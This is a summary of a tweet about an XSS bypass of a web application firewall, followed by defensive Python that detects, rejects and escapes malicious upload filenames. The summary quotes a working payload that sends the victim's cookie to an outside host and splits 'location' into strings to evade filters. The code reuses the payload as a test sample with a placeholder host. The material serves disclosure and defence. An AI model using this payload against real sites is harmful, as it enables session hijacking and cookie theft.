This tweet describes an XSS WAF bypass using the payload '10006630~!~/[redacted]/a/unix/apps/WAS/FileService/files/[redacted]/2023/9/21~!~xss"><svg><set onbegin="d=document,b='`',d['loca'+'tion']='//bxmbn.com/?'+b+cookie+b> .png~!~649159'. According to the tweet, the payload was carried in an uploaded file's filename, which let it slip past the WAF and take over the session when the filename was later rendered into the page. It is a critical vulnerability that WAF vendors should address. For more technical details, refer to the tweet.
Original tweet: https://twitter.com/MiniMjStar/status/1893760360722649279
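As an added example that is not part of the tweet or its summary, the following Python shows the defender's side of the technique described above: an upload path that (a) flags filenames carrying markup indicators such as a tag opener, an HTML event-handler attribute, or a property access split into concatenated strings to dodge keyword filters, (b) accepts only allowlisted filenames for storage, and (c) HTML-escapes any name before it is echoed into a page so a smuggled handler never executes. The sample filenames are constructed; the exfiltration host `attacker.example` is a placeholder, not the domain from the tweet.

```python
import html
import re

# Constructed sample filenames (not taken from the tweet). The second one
# mirrors the technique in the write-up: markup smuggled through an upload
# filename, with the exfiltration host replaced by a placeholder.
SAMPLE_FILENAMES = [
    "report-2023-09-21.png",
    'xss"><svg><set onbegin="d=document,b=\'`\',d[\'loca\'+\'tion\']=\'//attacker.example/?\'+b+cookie+b"> .png',
    "invoice (final).pdf",
]

# Indicators a reviewer would look for in upload logs or stored metadata.
_INDICATORS = [
    ("tag", re.compile(r"<\s*[a-zA-Z]")),                          # an HTML/SVG tag opener
    ("event_handler", re.compile(r"\bon[a-zA-Z]+\s*=", re.IGNORECASE)),  # onbegin=, onerror=, ...
    ("split_access", re.compile(r"\[\s*'[^']*'\s*\+\s*'[^']*'\s*\]")),  # d['loca'+'tion']
]

# Storage allowlist: letters, digits, dot, underscore, hyphen; must not start
# with a dot and must not contain a traversal sequence.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


def find_markup_indicators(name: str) -> list[str]:
    """Return the names of every indicator pattern present in a filename."""
    return [label for label, pattern in _INDICATORS if pattern.search(name)]


def is_safe_filename(name: str) -> bool:
    """True only for names that match the storage allowlist."""
    return bool(_SAFE_NAME.fullmatch(name)) and ".." not in name


def render_filename_cell(name: str) -> str:
    """Escape a filename for inclusion in HTML text or an attribute value.

    quote=True also escapes single and double quotes, so a name cannot break
    out of an attribute the way the tweet's payload breaks out with xss">.
    """
    return html.escape(name, quote=True)


def review_upload(name: str) -> dict:
    """Defender-side decision for one upload: store only allowlisted names,
    surface indicators for investigation, and always escape before display."""
    return {
        "accepted": is_safe_filename(name),
        "indicators": find_markup_indicators(name),
        "rendered": render_filename_cell(name),
    }


if __name__ == "__main__":
    for sample in SAMPLE_FILENAMES:
        verdict = review_upload(sample)
        print(f"{sample!r}\n  accepted={verdict['accepted']} "
              f"indicators={verdict['indicators']}\n  rendered={verdict['rendered']}")
```

The allowlist rejects the benign "invoice (final).pdf" as well as the payload, which is the intended trade-off: a strict storage name plus a separately escaped display name is simpler to reason about than trying to enumerate every dangerous character, and it does not depend on the WAF catching the request at all.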